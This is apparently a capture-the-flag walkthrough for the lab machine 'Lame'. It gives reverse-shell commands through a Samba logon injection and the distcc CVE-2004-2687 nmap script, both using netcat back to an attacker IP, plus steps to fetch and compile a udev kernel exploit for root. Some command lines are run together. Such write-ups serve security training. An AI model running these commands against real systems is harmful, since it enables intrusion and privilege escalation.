Lame
Authenticated SMB Reverse shell - Distccd v1 exploitation - Kernel 2.6 udev PrivEsc
Scanning
FTP Enumeration
Not vulnerable !
SMB Enumeration & Exploitation
WRITE access is enabled !
We can get a shell using this command - Only if we are an authenticated user !
logon "/=`nohup nc -nv 10.10.14.6 4444 -e /bin/sh`"
Alternative Method
Distcc v1 is vulnerable !
nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='nc -nv 10.10.14.6 4444 -e /bin/bash'"
We can start a listener !
nc -nlvp 4444
Privilege Escalation
We’ll need to escalate privileges. Google the OS version — Linux 2.6.24 to see if it is vulnerable to any exploits. I tried CVE 2016–5195 and CVE 2008–0600, but they didn’t work.
Let’s try CVE 2009–1185
searchsploit -m 8572.c
gcc 8572.c -o 8572python -m SimpleHTTPServer 9005
wget http://10.10.14.6:5555/8572To run it
We need to do two things:
Figure out the PID of the udevd netlink socket
Create a run file in /tmp and add a reverse shell to it. Since any payload in that file will run as root, we’ll get a privileged reverse shell
ps aux | grep devd
Start the listener and run the exploit with the PID
Last updated